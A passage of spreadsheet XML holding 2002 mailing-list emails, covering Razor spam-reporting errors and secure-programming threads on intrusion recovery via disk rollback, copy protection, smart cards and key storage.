Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">If you examine the log further, you'll see debug messages generated by the
(content) reporting process that follows error 230.On Wed, Oct 02, 2002 at 10:20:49PM -0700, Jordan Ritter wrote:
&gt; Error 230 occurs when you report a signature, but the server doesn't
&gt; know about the signature, so it wants the full content.  It's
&gt; basically an optimization.  
&gt; 
&gt; Beyond that, I'm not sure how to interpret that output.. what version?
&gt; Vipul?
&gt; 
&gt; On Wed, Oct 02, 2002 at 11:59:01PM -0400, Rose, Bobby wrote:
&gt; # What does this mean?  I set up procmailrc for a spamtrap but I'm getting
&gt; # an error.  I also am reporting to pyzor and dcc and they aren't
&gt; # registering an error.  What's weird is that it works sometimes.
&gt; # 
&gt; # .
&gt; # Oct 02 23:46:11.470523 report[14051]: [ 4] honor.cloudmark.com &gt;&gt; 20
&gt; # Oct 02 23:46:11.470805 report[14051]: [ 6] response to sent.3
&gt; # -res=1
&gt; # err=230
&gt; # .
&gt; # Oct 02 23:46:11.471825 report[14051]: [ 5] mail 1, orig_email, special
&gt; # case eng 1: Server accept
&gt; # ed report.
&gt; # Oct 02 23:46:11.472228 report[14051]: [ 8] mail 1.0, eng 4: err 230 -
&gt; # server wants mail
-- Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed yet."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</si>
  <si>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I'm still seeing razor reporting bomb out with a small variety of messages.
Would reinitializing something here help, or does razor do that as needed
anyway, and this just reflects trouble at the servers?Also, since these are reports I'm making from within Mutt, it's annoying
that the error messages garble the X window a bit. If there's nothing
constructive to do about razor failing, can I at least turn off the failure
messages? One way or the other I'd rather not see them.Whit On Wed, Sep 25, 2002 at 12:57:13PM -0400, Whit Blauvelt wrote:
&gt; I'm getting "no servers available" about half the time in the last few days.
&gt; This is with Razor 2. Is there something I need adjust in the installation
&gt; here, or are the servers just down/overloaded?
&gt; 
&gt; Thanks,
&gt; Whit
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">trying to report spam [razor chooses hubris] I timeout on the connection
(which seems to have gotten slower all morning) and receive the following
error message:razor-report error: connect4: nextserver: discover1: Error reading socket
connect4: nextserver: discover1: Error reading socketI then try to run razor-admin -discover and receive the same error .....
problems with the servers today? only one discovery server?Sven-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t>This is happening due to insufficient write access to the
"razor-agent.log" file. I was getting the same error, but
only as a non-root user.  As a quick workaround, you can do
"chmod go+w razor-agent.log".In Agent.pm, when then the Logger object is created, it
doesn't check whether the logfile is writable by the current
user. Then, when a write attempt is made, it bails out with
the "unblessed reference" error.Hope that helps,
Michael&gt;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line 25.
&gt;
&gt; I saw this after checking if my upgrade from razor-agents 2.12 to 2.14 went
&gt; okay, but the problem is still there after downgrading back to 2.12.  I
&gt; don't really know when this started happening, :-/
&gt;
&gt; Any ideas on the problem?
&gt;
&gt; - Robert-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1de'i Thursday 29 August 2002 13:36 la Fox cusku di'e
&gt; The following was personal correspondence between two people.  I can't
&gt;
&gt; fathom how Razor thinks it is spam:Was it sent in HTML? If so, and it had a background, the background may have 
been sent in a spam.cmeclax
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)iD8DBQE9bq9f3/k1hdmG9jMRAk4XAJ9CheEA+/hLIU9zTzfJbPyoPUm+XwCfXgZ1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t>
  </si>
  <si>
    <t>On Thu, Aug 29, 2002 at 07:33:44PM -0400, cmeclax po'u le cmevi'u ke'umri wrote:
&gt; 
&gt; Was it sent in HTML? If so, and it had a background, the background may have 
&gt; been sent in a spam.razor-agents 2.14 needs all parts to be spam to make a positive decision
(though this will change with the next release), so it couldn't have been
a background. Could you send me the debug log?cheers,
vipul.--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t>
  </si>
  <si>
    <t xml:space="preserve">I've been testing Razor, invoked from sendmail/procmail and so far it
seems pretty copacetic. Last night's spam to the list provided a good test
- the spam itself as well as several of the responses were flagged, as
other list members reported.This morning I piped the messages out from pine, being careful to use the
RAW mode, to razor-check -d. None of the messages come back as spam, even
the spam. Since folks revoked the false positives, I understand why they
would not come up, but not the spam itself, unless that also was revoked.Is this spam just a bad one to test against, or is there some setting in
pine or razor that I am missing?-- 
sc-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 9 Oct 2002 09:15:03 -0400 (EDT), Samuel Checker  wrote:&gt; I've been testing Razor, invoked from sendmail/procmail and so far it
&gt; seems pretty copacetic. Last night's spam to the list provided a good test
&gt; - the spam itself as well as several of the responses were flagged, as
&gt; other list members reported.
&gt; 
&gt; This morning I piped the messages out from pine, being careful to use the
&gt; RAW mode, to razor-check -d. None of the messages come back as spam, even
&gt; the spam. Since folks revoked the false positives, I understand why they
&gt; would not come up, but not the spam itself, unless that also was revoked.
&gt; 
&gt; Is this spam just a bad one to test against, or is there some setting in
&gt; pine or razor that I am missing?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
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
angegangen, Schlange-HÃ¼ften, sein es ganz rÃ¼ber jetzt. BÃ¼gel innen fest,
weil es eine lange, sÃ¼sse Fahrt ist. 
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 9 Oct 2002, Brian Fahrlander wrote:&gt; On Wed, 9 Oct 2002 09:15:03 -0400 (EDT), Samuel Checker  wrote:
&gt;
&gt; &gt; I've been testing Razor, invoked from sendmail/procmail and so far it
&gt; &gt; seems pretty copacetic. Last night's spam to the list provided a good test
&gt; &gt; - the spam itself as well as several of the responses were flagged, as
&gt; &gt; other list members reported.
&gt; &gt;
&gt;
&gt;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&gt;I've not used Spamassassin on the KISS principle. I just have procmail
adding an X-header and optionally modifying the Subject if razor-check
comes back positive.-- 
sc-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">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be
required to begin paying Cloudmark/spamnet $1.00/user per year. I was
wondering if anyone else has received such a call?I am curious as to whether a spammer has begun to try contacting razor users
with the above tactic in an effort to get them to stop using razor or
whether the open source/community aspect of the razor project is going by
the wayside in lieu of a strictly commercial approach (ala brightmail and
the likes).Sven-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,I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machine.This is described here (thanks to Duane for providing this link on the
honeypots mailing list)
http://www.vmware.com/support/reference/common/disk_sharing.htmlCould this basic concept be used to easily make self-fixing client/server
applications that efficiently and automatically recover from most attacks,
even before those attacks have been discovered? Here is what I imagine.The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to performing nightly
ghosting operations, only it would be more efficient and involve less (or
no) downtime.Thanks for any opinions,
Ben
</t>
  </si>
  <si>
    <t>On Tue, Sep 03, 2002 at 09:03:40PM -0400, Yannick Gingras wrote:
&gt; This make me wonder about the relative protection of smart cards.  They have 
&gt; an internal procession unit around 4MHz.  Can we consider them as trusted 
&gt; hardware ?  The ability to ship smart cards periodicaly uppon cashing of a 
&gt; monthly subscription fee would not raise too much the cost of "renting" the 
&gt; system.  Smart card do their own self encryption.  Can they be used to 
&gt; decrypt data needed by the system ?  The input of the system could me mangled 
&gt; and the would keep a reference of how long it was in service.
&gt; 
&gt; This sounds really feasible but I may be totaly wrong.  I may also be wrong 
&gt; about the safety of a smart card.  
&gt; 
&gt; What do you think ?That's similar to using hard-locks (either the old parallel, or the new
usb).The problem is that that piece of hardware is trustworthy, but the rest of
the PC isn't, so a cracker just needs to simulate the lock/smart card, or
peek at the executable after the lock has been deactivated.Regards,
Luciano Rocha-- 
Consciousness: that annoying time between naps.</t>
  </si>
  <si>
    <t xml:space="preserve">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RAID?Glenn Everhart
-----Original Message-----
From: bmord@icon-nicholson.com [mailto:bmord@icon-nicholson.com]
Sent: Tuesday, September 03, 2002 3:04 PM
To: Webappsec Securityfocus.Com; SECPROG Securityfocus
Subject: use of base image / delta image for automated recovery from
attacks
Hi,I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machine.This is described here (thanks to Duane for providing this link on the
honeypots mailing list)
http://www.vmware.com/support/reference/common/disk_sharing.htmlCould this basic concept be used to easily make self-fixing client/server
applications that efficiently and automatically recover from most attacks,
even before those attacks have been discovered? Here is what I imagine.The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to performing nightly
ghosting operations, only it would be more efficient and involve less (or
no) downtime.Thanks for any opinions,
Ben
**********************************************************************
This transmission may contain information that is privileged, confidential and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you
**********************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Scott MacKenzie wrote:&gt;There is a software package that is used (or was up through w2k) 
&gt;on MicroSloth for this purpose. Ghost, or some such. One essentially 
&gt;"takes a picture" of the machine's proper config, and then upon 
&gt;schedule or demand replaces the machine's current config with the 
&gt;proper picture. It essentially over-writes the entire disk drive. 
&gt;Especially good for student access machines at libraries, etc.
&gt;
And it is pretty common practice in some environments with public 
workstations to just wipe and re-install Windows machines on a weekly 
(or even daily) basis. It's easier than trying to maintain Windows.Crispin-- 
Crispin Cowan, Ph.D.
Chief Scientist, WireX                      http://wirex.com/~crispin/
Security Hardened Linux Distribution:       http://immunix.org
Available for purchase: http://wirex.com/Products/Immunix/purchase.html
</t>
  </si>
  <si>
    <t>the only way to insure a safe key is to use all the storage space in the
universe. too big to decrypt.my point is there will never be a "safe" key. what I would consider is how
long does the data need to be protected. if you need to protect the data for
longer than 6 months, do not release it to the public. if you are trying to
stop the general public (your customer) from coping the data then use what
is available on the market. If you want to stop the bootleggers do not
release the data to the public.I have never seen a lock that could not be unlocked. the act of unlocking
the key gives away it's secret.the tougher the lock the more pissed-off your customers will be. take MS-XP
for example. only the home user is forced to register. think of the
nightmare if business had to register every copy. how many times have we
needed to reinstall our laptop OS? notice the amount of Mac's sold after the
XP release. these where mostly home users that converted to Mac OS.the new Audio CD's that have digital copy protection so not play on my
computer. does this stop me from copying the CD? no. however it does make me
return them and get my money back.the more popular the software the more likely it is to be cracked.jef</t>
  </si>
  <si>
    <t xml:space="preserve">There is a software package that is used (or was up through w2k) 
on MicroSloth for this purpose. Ghost, or some such. One essentially 
"takes a picture" of the machine's proper config, and then upon 
schedule or demand replaces the machine's current config with the 
proper picture. It essentially over-writes the entire disk drive. 
Especially good for student access machines at libraries, etc.Ben Mord wrote:
&gt; 
&gt;   -----Original Message-----
&gt;   From: Crispin Cowan [mailto:crispin@wirex.com]
&gt;   Sent: Wednesday, September 04, 2002 5:46 PM
&gt;   To: Ben Mord
&gt;   Cc: Webappsec Securityfocus.Com; SECPROG Securityfocus
&gt;   Subject: Re: use of base image / delta image for automated recovery from
&gt;  attacks
&gt; 
&gt; &gt;  I did my dissertation work in this area (Optimistic Computing) and so was
&gt; &gt;interested in applying it to the security problem. Unfortunately, you hit a
&gt; &gt;bunch of problems:
&gt; 
&gt; &gt;    a.. When can you "commit" a state as being "good"?  You can't run from
&gt; a
&gt; &gt;redo log forever; the performance and storage penalties accumulate. Even
&gt; log
&gt; &gt;structured file systems garbage collect eventually. So you have to commit
&gt; &gt;sometime. The problem is that if you commit too eagerly, you might commit
&gt; &gt;corrupted state. If you commit too conservatively, you eat performance and
&gt; &gt;storage penalties.
&gt; &gt;    b.. What do you do if you discover that there is corrupted state in the
&gt; &gt;*middle* of your redo log, and you want some of the critical state that
&gt; &gt;comes after it? You need some way to dig the corruption out of the middle
&gt; &gt;and save the rest. My dissertation solves this problem, but you have to
&gt; &gt;re-write everything in my programming language :)
&gt; .    c.. Just doing this at all imposes substantial performance penalties. I
&gt; &gt;love VMWare, and use it every day (the best $200 I ever spent on software)
&gt; &gt;.but it is not very fast.
&gt; 
&gt; My proposed solution to the first two problems you mention is to be less
&gt; ambitious. The idea is that you *never* commit - instead, you simply revert
&gt; to base state on reboot. Obviously, you can't do this with partitions that
&gt; accrue important state, e.g. a partition that stores database table data.
&gt; But in your typical web application, most partitions do not accrue important
&gt; state. For example, your typical web server or application server could have
&gt; their entire state reset back to a known base state during each reboot
&gt; without harm.
&gt; The advantage of being less ambitious is that we have a quick and easy way
&gt; to frustrate certain attacks without rewriting all of our software or
&gt; spending lots of money on additional application-specific coding.
&gt; 
&gt; The first two problems you describe only occur if we become more ambitious
&gt; and try to apply these same techniques to, for example, the database table
&gt; partitions, where state changes remain important across reboots. That would
&gt; certainly be a nice touch! But as you point out, many problems would have to
&gt; be addressed first, and the hardest of these can not be abstracted away from
&gt; the particular application. Not the least of these is the problem of writing
&gt; heuristics for delineating good from malevolent state. That task is roughly
&gt; analogous to what antiviral software authors do for a living, only this work
&gt; could not be shared across many different systems as it would be specific to
&gt; a paritcular application.
&gt; 
&gt; The third problem you mention - performance penalty - is an argument for
&gt; doing this in hardware, much like hardware raid. Another argument for doing
&gt; this in hardware is hack resistance. Changing the base instance should
&gt; require physical access to the console, e.g. by requiring that you first
&gt; flip a physical switch on your RAID hardware or modify a bios setting. If
&gt; the base image can be modified remotely or by software, then you have to
&gt; worry about whether an implementation flaw might permit a cracker to modify
&gt; the base image remotely.
&gt; 
&gt; Ben-- 
    (                                                ______
    ))   .-- Scott MacKenzie; Dine' College ISD --.   &gt;===&lt;--.
  C|~~| (&gt;---  Phone/Voice Mail:  928-724-6639 ---&lt;) | ; o |-'
   |  |  \---  Senior DBA/CARS Coordinator/Etc. --/  |  _  |
   `--'   `- Email: scottm@crystal.ncc.cc.nm.us -'   `-----'
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; However, cracking and reverse engineering tools are not so ubiquitous on
&gt; UNIX as they are on Windows platform for two main reasons:
&gt;
&gt; 1. The main customers of commercial Unices (Solaris, HP-UX, Aix, SCO...)
&gt; are respectable companies. They are ready to pay big bucks for software
&gt; they need: the reputation matters.
&gt;
&gt; 2. Most software for free and open source Unices like Linux and xBSD (this
&gt; software often may be used on commercial unices as well) is, well, free and
&gt; open source.Thanks to your answers, I start to see where I should head for.  What are your 
sugestions for protecting a 100% online requirement system ?-- 
Yannick Gingras
Coder for OBB : Observing Bantu-speaking Butanone
http://OpenBeatBox.org
</t>
  </si>
  <si>
    <t>Ben Mord wrote:&gt;     -----Original Message-----
&gt;     *From:* Crispin Cowan [mailto:crispin@wirex.com]
&gt;     *Sent:* Wednesday, September 04, 2002 5:46 PM
&gt;     *To:* Ben Mord
&gt;     *Cc:* Webappsec Securityfocus.Com; SECPROG Securityfocus
&gt;     *Subject:* Re: use of base image / delta image for automated
&gt;     recovery from attacks
&gt;
&gt;     Ben Mord wrote:
&gt;
&gt;&gt;I was inspired by a mode of operation supported by VMWare. [use VMWare's ability to rolll back state to recover from intrusions]
&gt;&gt;
&gt;     I did my dissertation work in this area (Optimistic Computing
&gt;     ) and so was
&gt;     interested in applying it to the security problem. Unfortunately,
&gt;     you hit a bunch of problems:
&gt;
&gt;         * When can you "commit" a state as being "good"?  You can't
&gt;           run from a redo log forever; the performance and storage
&gt;           penalties accumulate. Even log structured file systems
&gt;           garbage collect eventually. So you have to commit sometime.
&gt;           The problem is that if you commit too eagerly, you might
&gt;           commit corrupted state. If you commit too conservatively,
&gt;           you eat performance and storage penalties.
&gt;         * What do you do if you discover that there is corrupted state
&gt;           in the *middle* of your redo log, and you want some of the
&gt;           critical state that comes after it? You need some way to dig
&gt;           the corruption out of the middle and save the rest. My
&gt;           dissertation solves this problem, but you have to re-write
&gt;           everything in my programming language :)
&gt;         * Just doing this at all imposes substantial performance
&gt;           penalties. I love VMWare, and use it every day (the best
&gt;           $200 I ever spent on software) but it is not very fast.   
&gt;
&gt; My proposed solution to the first two problems you mention is to be 
&gt; less ambitious. The idea is that you *never* commit - instead, you 
&gt; simply revert to base state on reboot.Ah. In that case, you can use something considerably less powerful than 
VMWare. All you need is a machine configured to boot from CD-ROM and use 
a RAM disk for scratch space. Numerous Linux distros are available that 
let you boot a stateless but functional system from CD-ROM.&gt; Obviously, you can't do this with partitions that accrue important 
&gt; state, e.g. a partition that stores database table data.... but if you *do* want some state to persist, then you need a 
mountable writable partition. To protect it, you need some kind of 
access control management to decide who can do what to the writable 
partition, blah blah blah ... and before you know it, the security 
problem starts to look just like it does for conventional servers.Simple approxmation to this: make /usr a separate partion, and mount it 
read-only:    * The good news: attackers that want to trojan your software have to
      reboot, at least.
    * The bad news: administrators that want to update your software
      have to reboot, at least.Crispin-- 
Crispin Cowan, Ph.D.
Chief Scientist, WireX                      http://wirex.com/~crispin/
Security Hardened Linux Distribution:       http://immunix.org
Available for purchase: http://wirex.com/Products/Immunix/purchase.html</t>
  </si>
  <si>
    <t xml:space="preserve">
-----Original Message-----
From: Crispin Cowan [mailto:crispin@wirex.com]
Sent: Wednesday, September 04, 2002 7:30 PM
To: Ben Mord
Cc: Webappsec Securityfocus.Com; SECPROG Securityfocus
Subject: Re: use of base image / delta image for automated recovery from
attacks
Ben Mord wrote:&gt;&gt;     -----Original Message-----
&gt;&gt;     *From:* Crispin Cowan [mailto:crispin@wirex.com]
&gt;&gt;     *Sent:* Wednesday, September 04, 2002 5:46 PM
&gt;&gt;     *To:* Ben Mord
&gt;&gt;     *Cc:* Webappsec Securityfocus.Com; SECPROG Securityfocus
&gt;&gt;     *Subject:* Re: use of base image / delta image for automated
&gt;&gt;     recovery from attacks
&gt;&gt;
&gt;&gt;     Ben Mord wrote:
&gt;&gt;
&gt;&gt; My proposed solution to the first two problems you mention is to be
&gt;&gt; less ambitious. The idea is that you *never* commit - instead, you
&gt;&gt; simply revert to base state on reboot.&gt;Ah. In that case, you can use something considerably less powerful than
&gt;VMWare. All you need is a machine configured to boot from CD-ROM and use
&gt;a RAM disk for scratch space. Numerous Linux distros are available that
&gt;let you boot a stateless but functional system from CD-ROM.But RAM is expensive, and the directory structures of many systems (e.g.
Windows) are not sufficiently organized and standardized to make this
combination of bootable CDs and RAM drives practical. Even if you are
fortunate enough to be using Linux (or another FHS-compliant *nix), you
still can't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cheaper.&gt;&gt; Obviously, you can't do this with partitions that accrue important
&gt;&gt; state, e.g. a partition that stores database table data.&gt;... but if you *do* want some state to persist, then you need a
&gt;mountable writable partition. To protect it, you need some kind of
&gt;access control management to decide who can do what to the writable
&gt;partition, blah blah blah ... and before you know it, the security
&gt;problem starts to look just like it does for conventional servers.Right. This is why you would consolidate all state of any long-term
significance on just a couple partitions, and why you would not put static
application code on these changeable partitions. Fortunately, most large
client/server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 writeable versus unwritable
because the "unchangeable" partitions might be written to for temporary swap
space. Who knows what Windows does internally?)My point is that there should be a market out there for a hardware RAID
device that can split designated partitions into a permanent base image
partition and a temporary delta image partition, that has some simple but
solid security measures to prevent the unauthorized remote modification of
base images, and that can be configured to clear the delta image when the
server is rebooted. If some vendor wished to implement this, they could then
market this as a mechanism to help frustrate broad classes of attack that
rely on the permanent modification of system or application files via buffer
overflows, platform and middleware bugs, etc. The prevention of unauthorized
modification of application data, of course, would not be addressed by this
particular product. But there are many other techniques out there to defend
application data. But those techniques all assume that your system itself
has not been compromised at a lower level, which is where this product could
help.I would have to think that these features would be relatively easy for a
hardware RAID vendor to implement. (I'm just guessing, of course, with no
knowledge of how hardware RAID works internally.) If anyone knows of such a
product, I'd love to hear about it.Ben
</t>
  </si>
  <si>
    <t xml:space="preserve">HiOn Wed, 4 Sep 2002, Yannick Gingras wrote:&gt; BTW thanks for all of you who provided interestiong insight.  I'm playing with 
&gt; gdb's dissassembler now but I don't think it's what a typical cracker would 
&gt; use.  Any hints on UNIX cracking tools ?There's also an 'objdump' program, and 'biew' hex viewer/disassembler. A good 
starting point to search is http://www.freshmeat.net/However, cracking and reverse engineering tools are not so ubiquitous on UNIX as 
they are on Windows platform for two main reasons:1. The main customers of commercial Unices (Solaris, HP-UX, Aix, SCO...) are 
respectable companies. They are ready to pay big bucks for software they need: the reputation matters.2. Most software for free and open source Unices like Linux and xBSD (this 
software often may be used on commercial unices as well) is, well, free and 
open source.Regards
/Artem-- 
 Artem Frolov 
/------------------------------------------------------------------\
 Software Engineer, System Administrator                       
 Institute for System Programming, Russian Academy of Sciences     
 Tel. +7 095 912-5317 (ext 4406), Cellular: +7 095 768-7067
 C7 40 CA 41 2A 18 89 D6  29 45 DF 50 75 13 6D 7A  A4 87 2B 76
\------------------------------------------------------------------/------------------------------------------------------------------
Basic Definitions of Science:
	If it's green or wiggles, it's biology.
	If it stinks, it's chemistry.
	If it doesn't work, it's physics.
------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Ben Mord said:
&gt; 
&gt; &gt;Ah. In that case, you can use something considerably less powerful than
&gt; &gt;VMWare. All you need is a machine configured to boot from CD-ROM and use
&gt; &gt;a RAM disk for scratch space. Numerous Linux distros are available that
&gt; &gt;let you boot a stateless but functional system from CD-ROM.
&gt; 
&gt; But RAM is expensive, and the directory structures of many systems (e.g.
&gt; Windows) are not sufficiently organized and standardized to make this
&gt; combination of bootable CDs and RAM drives practical. Even if you are
&gt; fortunate enough to be using Linux (or another FHS-compliant *nix), you
&gt; still can't fit a lot on a CD. Its not unusual today to have gigabytes of
&gt; static multimedia content on the web server. This particular problem can be
&gt; alleviated somewhat by using DVDs, but this is a temporary solution at best
&gt; which will become outdated quickly as our data requirements grow and hard
&gt; drives become cheaper.So, just write-protect the hard disk for partitions that are static.
I seem to recall an article on this (early 80's, Byte magazine, perhaps?)
for BBS systems or for testing unknown (perhaps trojan horse) software. - George-- 
 ----------------------------------------------------------------------
  George Dinwiddie                             gdinwiddie@alberg30.org
  The gods do not deduct from man's allotted span those hours spent in
  sailing.                                    http://www.Alberg30.org/
 ----------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">On 5 Sep 2002, Richard Bartlett wrote:Richard,&gt; I have a customer who is developing some printer driver code to allow 
&gt; custom driver settings (n-up, booklet, duplex etc.) to be saved up to the 
&gt; server to be retrieved by other users.   The data is being written, by a 
&gt; printer driver (using the logged on users authentication, to a registry 
&gt; key) HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows NT 
&gt; x86\Drivers\Version-3\{Driver Name}\{Custom Key}\Subkey).Let me get this straight; a registry key is loaded from the server onto 
the client workstations who can modify it, then write it back onto the 
server's own registry - which is not going to use it?&gt; The question is, what are the security risks of allowing users to write 
&gt; to this key?  The data is string data, in the form of delimited numeric 
&gt; values.  This data is then retrieved by capable printer drivers and 
&gt; interpreted.
&gt; 
&gt; The risks as I see it are twofold;
&gt; (1) The risks of a compromise to the server using this registry key.  I 
&gt; think this is unlikeley as the server itself does not use this data, only 
&gt; client PC's do.  Unless someone knows a way to travel out of a hive up 
&gt; the registry bypassing the permissions set using regedt32.What is the reason to write a registry key to a server if the server 
itself is not using it?
I don't think you should worry too much about someone travelling out of 
the hive, but again, I'm curious as to how the driver actually modifies 
the keys on the server.&gt; (2) The risks of a compromise to the client (far more likely).  This 
&gt; would probably be by a malformed or extremely long string in the key 
&gt; value, which would presumably lead to either DOS or system compromise by 
&gt; buffer overflow on the client system.And if the client writes the key back onto the server, yes, there's wide 
open for something nasty here.
Two other things spring to mind; 
1) If anyone can modify the key, how do you make sure that two users are 
not overwriting the same key, thereby causing undesirable effects.
2) If anyone have permissions to write to the key (and below), anyone can 
create thousands of extra keys under this key, thereby filling up the 
registry. The result of such a thing is obvious.If I got this all wrong, I'd be happy that you clarify a bit more and tell 
me where I might have misunderstood.
Med venlig hilsen / Best regards,
-Allan JensenSi hoc signum legere potes, operis boni in rebus Latinus alacribus et 
fructuosis potiri potes!
</t>
  </si>
  <si>
    <t xml:space="preserve">Bryan Feir [mailto:bryan@sgl.crestech.ca] wrote: &gt;Of course, once one player key was broken, dealing with the rest became
&gt; a known plaintext attack, and the rest of the player keys went down
like
&gt; a row of dominos.The actual follow-up to the Xing player break was more interesting than
that.  The mere knowledge of known plaintext (a corresponding input and
output) does not necessarily make it trivial to break a properly
designed systems and/or algorithm. The primary reason it was easy for
CSS is because the CSS key was only 40-bits, and thereby easy to break
with exhaustive search attacks.  It was only 40-bits (speculated)
because of a misunderstanding of the government cryptography export
rules at the time.Even more interesting, to me at least, was that soon after the Xing
player break, people started studying the CSS algorithm itself.  They
rapidly found serious design flaws which left the 40-bit CSS algorithm
with an actual strength of around 23-bits (from memory, and new attacks
might have further reduced the strength).  This is another great example
showing why proprietary cryptography algorithms should be viewed with
the greatest of suspicion.
On Tue, Sep 03, 2002 at 09:03:40PM -0400, Yannick Gingras wrote:
&gt; This make me wonder about the relative protection of smart cards.
They have 
&gt; an internal procession unit around 4MHz.  Can we consider them as
trusted 
&gt; hardware ?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[strange@nsk.yi.org] wrote: &gt; The problem is that that piece of hardware is trustworthy, but the
rest of
&gt; the PC isn't, so a cracker just needs to simulate the lock/smart card,
or
&gt; peek at the executable after the lock has been deactivated.Going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hassle-factor) can greatly improve the protection.
Since you are talking about the use of standard PC workstations, I
presume what you are trying to protect is not THAT valuable.  I'm afraid
most security measures don't come for free.
Michael McKay 
Director of Software Development 
mmckay@iscubed.com   Information Security Systems &amp; Services Inc. 
  19925 Stevens Creek Blvd. Cupertino, CA 95014 
  Phone: 408.725.7136  x 4138    Fax: 408.973.7239   www.iscubed.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday 19 September 2002 16:44, Michael McKay wrote:
&gt; On Tue, Sep 03, 2002 at 09:03:40PM -0400, Yannick Gingras wrote:
&gt; &gt; This make me wonder about the relative protection of smart cards.
&gt; They have an internal procession unit around 4MHz.  Can we consider them as
&gt; trusted hardware ?SmartCards do not have fixed clock rates (more often than not) as the ISO spec 
dictates that they are externally powered and clocked, but SmartCards used 
for security purposes (usually JavaCards) have built-in crypto co-processors 
that make clock rate irrelevant. 4mhz SmartCards can often preform triple-DES 
faster than general purpose processors clocked at ten times the speed.That said, clock rate has nothing with how trustworthy a card is. As Michael 
pointed out, there's something of an arms-race between manufacturers and 
attackers which has nothing to do with clock rate, and time and time again 
what we've seen is that it's not a question of "is it secure", it's a 
question of "who is it secure from and for how long?" Security is rarely a 
question of absolutes (despite the often boolean nature of a break), rather 
it's a question of assessing, quantifying, and managing risk. SmartCards are 
designed to address threats in which the cost of protection cannot exceed the 
$1-20 range (depending on the application).As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it's probably the wrong tool. In either application, 
a risk/cost ratio must justify the use of the protection measure in question.-- 
Alex Russell
alex@SecurePipe.com
alex@netWindows.org
</t>
  </si>
  <si>
    <t xml:space="preserve">reply to the mail from Ben Mord (bmord@icon-nicholson.com):&gt; Hi,Hello,&lt; ... snipped for brevity ... &gt;&gt; ... This concept could also be
&gt; applied to the application servers, and even the database server partitions
&gt; (except for those partitions which contain the table data files, of course.)	Although the data might just be the information that needs protecting.&gt; Does anyone do this already? Or is this a new concept?	I've seen this implemented for a shell server, although they chose
to have their root on a CD-WR in a CD-R drive. Which meant that even
when compromised it was only possible to examine other users data.
	AFAIR(emember) they just swapped CD's when a root exploit was found.&gt; Thanks for any opinions,NPblaze your trail
--
redhat'I am become Shiva, destroyer of worlds'
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi everybody!I'm writing a web application in java (tomcat + jsp/servlets + database 
access with postgreSQL).This will be released under the GPL and will eventually be useful as a 
framework for other web applications.The application main focus is e-commerce, but not limited to that.I would like to use some form of cryptography to protect data on the 
database, but I have some problem figuring out the right approach.Above all, how to store passwords and keys in a shared web server.A problem that I was unable to solve is how to store keys for 
encryption/decryption. The api that I'm using is the jca (jdk1.4.x),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doesn't really solve the problem.Where I can found good documentation about this topic?There is another approach that I would share with the list, something I 
thought that can be of bit interest, but probabily wrong and insecure. 
After all, I'm a real beginner in secure programming, and I'm here to 
learn methods and technics.First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keys.The web application could then open an ssl connection (could be done in 
the init method at server startup) to get database passwords. The small 
bean could check via code signature/rmi/whatever else that the source 
is the right one, and handle all the database connections, or give the 
db connection/password to the main web application.In this way, we solve the problem of keeping the keys and passwords in 
shared directories, and also, an attacker should get root/bean user 
account to read data. This is not perfect, and works only if your 
provider gives the opportunity to configure a separated java 
application (that means, really, another server running in the 
background).Any suggestions?Thank you,
Mario Torre
-- 
Please avoid sending me Word or PowerPoint attachments.
See http://www.fsf.org/philosophy/no-word-attachments.html </t>
  </si>
  <si>
